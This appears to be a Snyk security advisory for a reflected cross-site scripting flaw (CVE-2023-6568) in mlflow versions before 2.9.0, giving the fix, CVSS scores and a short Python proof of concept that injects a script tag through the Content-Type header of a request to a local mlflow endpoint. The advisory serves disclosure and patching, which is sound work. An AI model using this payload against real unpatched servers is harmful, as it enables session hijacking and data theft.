<p>Upgrade <code>mlflow</code> to version 2.9.0 or higher.</p>

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affecting mlflow package, versions [,2.9.0)

Threat Intelligence

Proof of concept

0.08% (35^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-PYTHON-MLFLOW-6102495
published 7 Dec 2023
disclosed 7 Dec 2023
credit Mokrane Abdelmalek

Report a new vulnerability Found a mistake?

Introduced: 7 Dec 2023

CVE-2023-6568 Open this link in a new tab CWE-79 Open this link in a new tab

How to fix?

Upgrade mlflow to version 2.9.0 or higher.

Overview

mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models.

Affected versions of this package are vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). An attacker can inject code into the Content-Type header of a POST request, which is then reflected back to the user without proper sanitization or escaping. This can lead to compromising user sessions, stealing sensitive information, or performing other malicious actions on the user's behalf.

PoC

from requests import post

url = 'http://127.0.0.1:5000/api/2.0/mlflow/users/create'

headers = {
    'Content-Type': '<script>alert(document.domain)</script>',
}

resp = post(url, headers=headers).text
print(resp)

References

CVSS Scores

version 3.1

Attack Vector (AV)

Network
Attack Complexity (AC)

Low
Privileges Required (PR)

None
User Interaction (UI)

Required

Scope (S)

Unchanged

Confidentiality (C)

High
Integrity (I)

None
Availability (A)

None